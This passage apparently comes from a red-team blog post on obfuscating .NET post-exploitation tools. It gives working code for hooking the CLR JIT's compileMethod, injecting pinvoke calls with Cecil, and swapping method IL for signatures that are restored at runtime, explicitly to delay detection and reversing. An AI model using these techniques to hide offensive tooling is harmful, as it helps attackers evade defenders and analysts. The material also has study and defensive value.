To be honest, you could take this as far as you want (for example, harvesting common class and method names and using these rather than random names). Hopefully, though, this example gives you an idea of just how powerful Cecil can be for automating the obfuscation of tools. When combined with a platform like Azure DevOps, each merge of a tool on GitHub will receive the same level of obfuscation without us having to touch Visual Studio.

Now, although we have done a lot to the target, ultimately we still have an assembly which can be stepped through with a .NET debugger to reveal its true nature (as long as the decryption key can be captured). What if we could cause a bit more pain by forcing analysis out of the managed .NET world and into the unmanaged world? This idea is actually already used by certain .NET packers, but I still find that some people aren’t aware of the technique, which of course helps when you are hoping to delay the detection or reversing of your tools.

Packing your Build - Going Native

The concept itself is actually straightforward: we will obfuscate our IL code, and instrument the .NET CLR to restore it to its original state during execution. But before we can do this, we need to understand a little about how our .NET application code is converted to native code by the CLR at runtime.

Before I continue, it’s worth giving a shout out to Jerry Wang’s post on CodeProject here. His post covers the redirection of .NET via CLR hooking and is pretty much the go-to reference on this topic.

As we know, .NET uses a JIT compiler: code is compiled to an intermediate language, which is converted to native code when it is due to be executed. The engine responsible for completing this transformation is CLRJIT.DLL, which is part of the installed .NET framework within \Windows\Microsoft.NET.



So, is it possible to position ourselves within this JIT process? To understand this, we need to dig deep into CLRJIT.DLL:



Let’s fire up WinDBG and see how this JIT process works. First we need to know where to add a breakpoint to view the translation of IL to native code. If we review the open source .NET CLR, we can see that CILJit::compileMethod is a good candidate:



To demo how JIT compilation works within .NET, we can use PowerShell as our test case. We start by adding a breakpoint to CILJit::compileMethod and executing something which will likely force the JIT process into play, such as Add-Type. Doing this will cause our breakpoint to be hit, showing we are in the right place to start our analysis:

Now if you want to play around with the .NET JIT process at this point, load the SOS extension with:

```
.loadby sos clr
```

With the SOS extension loaded, continue execution and invoke the method we created with Add-Type using:

```powershell
[AAA.BBB]::TestMethod()
```

This should cause our breakpoint to be triggered again. Here we can use the SOS !dumpmd command to provide information on the method being compiled into native code:

```
!dumpmd poi(poi(methodInfo))
```



If we dump out the second argument to CILJit::compileMethod (this will be in r8, as rcx holds the this pointer and rdx the first argument), we see that it points at a CORINFO_METHOD_INFO structure carrying a pointer to the raw IL bytes to be compiled:



And using the SOS extension, we can view this from within WinDBG:

Now… what happens if we invoke the same method again? This time we don’t trigger our breakpoint. The reason for this is that compileMethod is only invoked the first time a method’s IL needs to be compiled into native code. Once this is done, the native code is cached and used for subsequent calls.

So now that we have seen it in action, it’s pretty obvious that CILJit::compileMethod is our candidate for hooking, allowing us to intercept and modify raw IL before it is JITed. Next we need to decide just how we will obfuscate the compiled methods.

To demonstrate this concept within our POC, we will extract the IL from each method and place it within a resource file. We can then replace the body of each method with an offset into this resource file. When our hooked compileMethod is handed one of these placeholder bodies, we are free to read the offset, retrieve the original IL from the resource contents and substitute it for the placeholder body.


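The resource layout isn't spelled out here, so as one possible scheme (an assumption, with hypothetical helper names), each method's IL could be stored as a 4-byte little-endian length followed by the IL bytes. The placeholder body left in the assembly then only needs to carry the record's offset, and the hook can map that offset back to the original IL:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/*
 * Append one method's IL to the resource buffer `res` (capacity `cap`) as
 * [4-byte little-endian length][IL bytes]. Returns the record's offset,
 * which is the value the placeholder method body would carry.
 */
uint32_t append_il(uint8_t *res, uint32_t cap, uint32_t *res_len,
                   const uint8_t *il, uint32_t il_len)
{
    uint32_t off = *res_len;

    assert(off + 4 + il_len <= cap);
    res[off]     = (uint8_t)(il_len & 0xFF);
    res[off + 1] = (uint8_t)((il_len >> 8) & 0xFF);
    res[off + 2] = (uint8_t)((il_len >> 16) & 0xFF);
    res[off + 3] = (uint8_t)((il_len >> 24) & 0xFF);
    memcpy(res + off + 4, il, il_len);
    *res_len = off + 4 + il_len;
    return off;
}

/* The lookup a compileMethod hook would perform: offset -> original IL bytes. */
const uint8_t *lookup_il(const uint8_t *res, uint32_t off, uint32_t *il_len)
{
    *il_len = (uint32_t)res[off] |
              ((uint32_t)res[off + 1] << 8) |
              ((uint32_t)res[off + 2] << 16) |
              ((uint32_t)res[off + 3] << 24);
    return res + off + 4;
}
```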

To achieve this, the first thing we need to create is the code which will hook CILJit::compileMethod. Unfortunately this method isn’t exported from CLRJIT.DLL; however, if we refer again to the .NET CLR source, we find that the exported function getJit returns a pointer to an instance of the CILJit class:
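Because getJit hands back a pointer to a C++ object rather than to a function, reaching compileMethod takes two dereferences: one to read the object's vtable pointer (its first field in the usual MSVC layout) and one to read slot 0 of that table, where compileMethod sits as the first virtual method declared on ICorJitCompiler. The C sketch below mimics that layout with a hypothetical fake object whose vtable holds marker addresses instead of real functions, just to show the pointer chasing:

```c
#include <assert.h>

/* Marker objects standing in for the first two virtual methods. */
static int compile_method_marker;
static int next_virtual_marker;

/* Fake vtable: an array of pointers, slot 0 first. */
static void *fake_vtable[] = { &compile_method_marker, &next_virtual_marker };

/* Fake object: its first (and only) field points at the vtable. */
struct fake_jit {
    void *vtbl;
};
static struct fake_jit fake_instance = { fake_vtable };

/* Object -> vtable pointer -> slot 0: the same double dereference applied to getJit()'s result. */
void *first_virtual(void *object)
{
    void **vtable = *(void **)object;
    return vtable[0];
}
```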

This means that we can grab a pointer to the compileMethod function via the VTable of the object returned from the getJit export:

```cpp
#include <windows.h>

// Function pointer type for clrjit.dll!getJit, which returns an ICorJitCompiler*
typedef void *(__stdcall *getJitExport)();

// Get the exported getJit function
getJitExport getJit = (getJitExport)GetProcAddress(LoadLibraryA("clrjit.dll"), "getJit");

// Call getJit to get the ICorJitCompiler instance; its first field is the vtable pointer
void *jit = getJit();

// compileMethod is the first entry in the vtable
void *compileMethod = *(void **)(*(void **)jit);
```

Now that we have a pointer to CILJit::compileMethod, we can patch in a hook to intercept calls. To do this we can add a JMP at the beginning of compileMethod:

```cpp
// JMP hook we will inject into the compileMethod function:
// mov rax, 0x4141414141414141 (placeholder address); jmp rax
char jmpHook[] = "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0";

...

// sizeof(jmpHook) includes the string literal's trailing NUL, so subtract 1 to cover just the 12 hook bytes
VirtualProtect(compileMethod, sizeof(jmpHook) - 1, PAGE_EXECUTE_READWRITE, &oldProtect);

// Copy our hook into compileMethod
memcpy(compileMethod, jmpHook, sizeof(jmpHook) - 1);

VirtualProtect(compileMethod, sizeof(jmpHook) - 1, oldProtect, &oldNewProtect);
```

As we also need a way to retain current register values, we will add a small stub which is responsible for saving all active registers, calling our hook, and then restoring registers and the stack before returning execution to compileMethod:

```asm
; Save registers
push rsp
push rax
push rbx
mov rax, qword [rsp + 0x48] ; Save arguments for passing to hook
mov rbx, qword [rsp + 0x50]
push rcx
push rdx
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
push rsi
push rdi
sub rsp, 0x60

; Drop the this pointer (rcx) and shift the remaining arguments along for our C hook
mov rcx, rdx
mov rdx, r8
mov r8, r9
mov r9, rax
mov qword [rsp + 0x28], rbx
movabs rax, 0x4141414141414141 ; updated to our C hook
call rax

; Restore registers and the stack
add rsp, 0x60
pop rdi
pop rsi
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rdx
pop rcx
pop rbx
pop rax
pop rsp

; Re-run the compileMethod prologue instructions overwritten by our JMP hook
mov rax, rsp
mov qword [rax + 8], rbx
mov qword [rax + 0x10], rbp
mov qword [rax + 0x18], rsi
movabs rbx, 0x4242424242424242 ; updated to compileMethod ptr, just past the overwritten instructions
jmp rbx
```

Our actual hook code is going to be pretty straightforward, mirroring the signature of the original CILJit::compileMethod:

```cpp
void compileMethodHook(class ICorJitInfo* compHnd, CORINFO_METHOD_INFO* methodInfo, unsigned flags, BYTE** entryAddress, ULONG* nativeSizeOfCode) {
    DWORD oldProtect;
    DWORD oldOldProtect;

    printf("Inside of our .NET hook\n");

    return;
}
```

With the core components crafted, we will wrap all of this up in a DLL and expose an export which we can call via our .NET tool:

```cpp
extern "C" {
    __declspec(dllexport) void Run(void* resourceData) {
        // Hook code here
    }
}
```

With our native hook prepared, we need a way to load our code during the execution of our obfuscated tool. To help with this we can use the previously discussed module initialiser technique to load our compiled hook DLL from an embedded resource. Once loaded, we can then invoke the exported Run method along with a pointer to the resource data.
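Inside Run, the placeholder addresses in the JMP hook and the register-saving stub (the runs of 0x41 and 0x42 bytes) have to be replaced with real pointers before the hook is copied over compileMethod. A portable sketch of that step follows, assuming the templates are held as plain byte arrays: `build_jmp_hook` emits the 12-byte `mov rax, imm64; jmp rax` sequence for a given target, and `patch_placeholder` finds the first 8-byte run of a marker byte and overwrites it with a little-endian address. Both helper names are hypothetical. Note that because `jmpHook` is declared from a string literal, `sizeof(jmpHook)` is 13, one more than the 12 hook bytes.

```c
#include <stdint.h>
#include <string.h>

#define JMP_HOOK_LEN 12  /* 48 B8 <imm64> FF E0 */

/* Hypothetical helper: write "mov rax, target; jmp rax" into out. */
static void build_jmp_hook(unsigned char out[JMP_HOOK_LEN], uint64_t target) {
    out[0] = 0x48;                  /* REX.W prefix */
    out[1] = 0xB8;                  /* mov rax, imm64 */
    for (int i = 0; i < 8; i++) {   /* imm64, little-endian */
        out[2 + i] = (unsigned char)(target >> (8 * i));
    }
    out[10] = 0xFF;                 /* jmp rax */
    out[11] = 0xE0;
}

/* Hypothetical helper: replace the first 8-byte run of `marker` in buf with
   `value` (little-endian). Returns 1 if a placeholder was patched, else 0. */
static int patch_placeholder(unsigned char *buf, size_t len,
                             unsigned char marker, uint64_t value) {
    for (size_t i = 0; i + 8 <= len; i++) {
        size_t j = 0;
        while (j < 8 && buf[i + j] == marker) j++;
        if (j == 8) {
            for (int k = 0; k < 8; k++) {
                buf[i + k] = (unsigned char)(value >> (8 * k));
            }
            return 1;
        }
    }
    return 0;
}
```

Patching the 0x41 run in the original `jmpHook` template produces exactly the same 12 bytes as `build_jmp_hook`, and a second call finds nothing left to patch.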

One difference from the earlier module initialiser example, however, is that we now need to invoke a DLL export via pinvoke. Cecil allows us to do this easily:

```csharp
var il = method.Body.GetILProcessor();

// Add a reference to our hook DLL
var loaderRef = new ModuleReference("loader.dll");
cecilAssembly.MainModule.ModuleReferences.Add(loaderRef);

// Create our pinvoke method definition for loader.dll!Run
MethodDefinition ourlibrary = new MethodDefinition("Run",
    Mono.Cecil.MethodAttributes.Public |
    Mono.Cecil.MethodAttributes.HideBySig |
    Mono.Cecil.MethodAttributes.Static |
    Mono.Cecil.MethodAttributes.PInvokeImpl,
    cecilAssembly.MainModule.TypeSystem.Void
);

// Add our [DllImport] attribute
ourlibrary.PInvokeInfo = new PInvokeInfo(PInvokeAttributes.NoMangle |
    PInvokeAttributes.CharSetUnicode |
    PInvokeAttributes.SupportsLastError |
    PInvokeAttributes.CallConvWinapi,
    "Run",
    loaderRef
);

// Add our pinvoke method definition parameters
ourlibrary.Parameters.Add(new ParameterDefinition("data", Mono.Cecil.ParameterAttributes.None, cecilAssembly.MainModule.TypeSystem.IntPtr));

// Add the method definition to xpnsec.win32 class
var t = new TypeDefinition("xpnsec", "win32", TypeAttributes.Class | TypeAttributes.Public, cecilAssembly.MainModule.TypeSystem.Object);
t.Methods.Add(ourlibrary);
cecilAssembly.MainModule.Types.Add(t);
```

Now that we have a way to intercept parameters passed to compileMethod, we need to identify methods which have had their IL removed. A simple way to do this is to add a signature to each method that we have obfuscated, which we can then identify within our hook. For example, if we use the following IL:

```
nop
nop
nop
nop
ldc.i4 [offset_to_il_in_resource]
```

We can then search for this in the compileMethod hook with:

```cpp
void compileMethodHook(class ICorJitInfo* compHnd, CORINFO_METHOD_INFO* methodInfo, unsigned flags, BYTE** entryAddress, ULONG* nativeSizeOfCode) {
    // Look for our signature (nop x4, ldc.i4) in bodies large enough to hold it
    if (methodInfo->ILCodeSize >= 9 && methodInfo->ILCode[0] == 0x00 && methodInfo->ILCode[1] == 0x00 && methodInfo->ILCode[2] == 0x00 && methodInfo->ILCode[3] == 0x00 && methodInfo->ILCode[4] == 0x20) {
        // This is a modified method
    }
}
```

All that is left to do is to prepare our target assembly by extracting method bodies, adding them to a resource, and replacing each body with our signature. Normally we would do this using Cecil; however, the issue with modifying a binary in this way is that we cannot (as far as I know at least) replace method bodies without Cecil modifying the tokens corresponding to types. So instead we will need to parse methods within the PE file and update them manually.
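A large part of parsing methods out of the PE file is taking the RVA that the metadata's MethodDef table records for each method body and converting it to a file offset using the section table. A minimal sketch of that conversion follows, assuming the section headers have already been read into a simplified, hypothetical `Section` struct that keeps only the `IMAGE_SECTION_HEADER` fields needed here; locating and reading the metadata tables themselves is left out.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for IMAGE_SECTION_HEADER. */
typedef struct {
    uint32_t VirtualAddress;    /* RVA where the section is mapped */
    uint32_t VirtualSize;       /* size of the section once mapped */
    uint32_t PointerToRawData;  /* file offset of the section's data */
    uint32_t SizeOfRawData;     /* bytes of the section present in the file */
} Section;

/* Convert an RVA to a file offset; returns -1 if no section's on-disk data
   covers the RVA. */
static int64_t rva_to_offset(const Section *sections, size_t count, uint32_t rva) {
    for (size_t i = 0; i < count; i++) {
        const Section *s = &sections[i];
        uint32_t size = s->VirtualSize ? s->VirtualSize : s->SizeOfRawData;
        if (rva >= s->VirtualAddress && rva - s->VirtualAddress < size) {
            uint32_t delta = rva - s->VirtualAddress;
            if (delta >= s->SizeOfRawData) {
                return -1;  /* inside the section, but not backed by file data */
            }
            return (int64_t)s->PointerToRawData + delta;
        }
    }
    return -1;
}
```

With a method body located this way, the header rules below tell us how many bytes to skip before the IL begins.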

We already know that a method consists of IL bytecode, but we also need to know that this bytecode is prefixed by a method header. There are two header formats, a “thin” format and a “fat” format. I won’t go into the internals too much as they aren’t important for what we are trying to achieve, but we do need to know how to identify the type of header. This is determined by the two least significant bits of the method's first byte: a value of 10 (0x2) signifies a thin header, while 11 (0x3) signifies a fat header. A thin header is 1 byte long, whereas a fat header is 12 bytes.
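Reading just enough of the header to find the IL might look like the sketch below. It follows the thin (tiny) and fat layouts from ECMA-335 Partition II, section 25.4: a thin header stores the code size in the upper six bits of its single byte, while a fat header records its own size in 4-byte units in the top four bits of its first 16-bit word and stores the code size as a little-endian 32-bit value at offset 4. The `MethodBody` struct and `parse_method_header` function are hypothetical names for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Low two bits of the first header byte (same values as corhdr.h). */
#define CorILMethod_TinyFormat 0x2
#define CorILMethod_FatFormat  0x3

/* Hypothetical result type: where the IL starts and how long it is. */
typedef struct {
    size_t header_size;  /* bytes to skip before the IL starts */
    uint32_t code_size;  /* length of the IL that follows */
} MethodBody;

/* Parse a method header at p (len bytes available). Returns 0 on success. */
static int parse_method_header(const uint8_t *p, size_t len, MethodBody *out) {
    if (len < 1) return -1;
    switch (p[0] & 0x3) {
    case CorILMethod_TinyFormat:
        out->header_size = 1;
        out->code_size = p[0] >> 2;          /* upper 6 bits hold the size */
        return 0;
    case CorILMethod_FatFormat: {
        if (len < 12) return -1;
        uint16_t flags_and_size = (uint16_t)(p[0] | (p[1] << 8));
        out->header_size = (size_t)(flags_and_size >> 12) * 4;  /* normally 12 */
        out->code_size = (uint32_t)p[4] | ((uint32_t)p[5] << 8) |
                         ((uint32_t)p[6] << 16) | ((uint32_t)p[7] << 24);
        return 0;
    }
    default:
        return -1;   /* not a valid method header */
    }
}
```

For example, a first byte of 0x0A is a thin header for a 2-byte body, while a fat header commonly begins with the bytes 0x13 0x30 (fat format, InitLocals, header size 3 × 4 bytes).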

As we don’t really care about the header other than the size, we can jump over this once we have identified the type. Once we are past this, we can add our raw IL, or in our case, our signature, which will be:

```
0x00                      nop
0x00                      nop
0x00                      nop
0x00                      nop
0x20 0x00 0x00 0x00 0x00  ldc.i4 [OFFSET]
```

Returning to our DLL hook code, we can then use the operand of the above ldc.i4 instruction to retrieve the original IL from the resource data and restore the method to its original state:

void compileMethodHook(class ICorJitInfo* compHnd, CORINFO_METHOD_INFO* methodInfo, unsigned flags, BYTE** entryAddress, ULONG* nativeSizeOfCode) {

DWORD oldProtect;

DWORD oldOldProtect;

if (methodInfo->ILCode[0] == 0x00 &&

methodInfo->ILCode[1] == 0x00 &&

methodInfo->ILCode[2] == 0x00 &&

methodInfo->ILCode[3] == 0x00 &&

methodInfo->ILCode[4] == 0x20)

{

// Use the DWORD as an offset into the resource consisting of the original IL

char *originalILPtr = originalILData + *(unsigned long *)(&methodInfo->ILCode[5]);

// Update the page protection of the IL to allow us to update

VirtualProtect(methodInfo->ILCode, methodInfo->ILCodeSize, PAGE_READWRITE, &oldProtect);

// Copy original IL in place of our signature

memcpy(methodInfo->ILCode, originalILPtr, methodInfo->ILCodeSize);

// Restore the page protection

VirtualProtect(methodInfo->ILCode, methodInfo->ILCodeSize, oldProtect, &oldOldProtect);

}

return;



}With all the pieces visualised, we now have a way to hide our IL from a managed disassembler. So what does this look like when actually used against a tool? Let’s take a look at a InveighZero, and how a method looks when not obfuscated:



After we run our IL obfuscator and attempt to decompile the same method back to C#, we actually see a crash due to the invalid method body:



However, viewing the IL reveals our signature:


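To make the marker in that listing concrete, here is a portable sketch of both sides of it: `write_signature` lays down the four `nop` bytes followed by `ldc.i4` and a little-endian 32-bit offset, and `read_signature` performs the same check as the hook and recovers the offset. The function names are hypothetical, and the sketch assumes the method body is at least nine bytes long; how the original tool treats shorter bodies or the bytes following the signature isn't covered here.

```c
#include <stddef.h>
#include <stdint.h>

#define SIG_LEN 9   /* 4 x nop (0x00) + ldc.i4 (0x20) + 4-byte operand */

/* Hypothetical helper: overwrite the start of an IL body with the marker.
   Returns -1 if the body is too short to hold it. */
static int write_signature(uint8_t *il, size_t il_len, uint32_t offset) {
    if (il_len < SIG_LEN) return -1;
    il[0] = il[1] = il[2] = il[3] = 0x00;          /* nop x4 */
    il[4] = 0x20;                                  /* ldc.i4 */
    for (int i = 0; i < 4; i++) {
        il[5 + i] = (uint8_t)(offset >> (8 * i));  /* little-endian operand */
    }
    return 0;
}

/* Hypothetical helper: check for the marker; on a match store the resource
   offset and return 1, otherwise return 0. */
static int read_signature(const uint8_t *il, size_t il_len, uint32_t *offset) {
    if (il_len < SIG_LEN) return 0;
    if (il[0] != 0x00 || il[1] != 0x00 || il[2] != 0x00 || il[3] != 0x00 ||
        il[4] != 0x20) {
        return 0;
    }
    *offset = (uint32_t)il[5] | ((uint32_t)il[6] << 8) |
              ((uint32_t)il[7] << 16) | ((uint32_t)il[8] << 24);
    return 1;
}
```

Writing the marker with offset 0x1234 stores the operand bytes 0x34 0x12 0x00 0x00, which `read_signature` turns back into 0x1234.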

And when executed:

The code for this example can be found here.

Hopefully this post has given you some ideas about automating your tool builds and how to change them up without requiring manual intervention. The samples here are only an example of what is possible; with frameworks like Cecil and Roslyn, as well as CI platforms like Azure DevOps, it is interesting to see what can be done with automation when working with the many tools available to us for post-exploitation.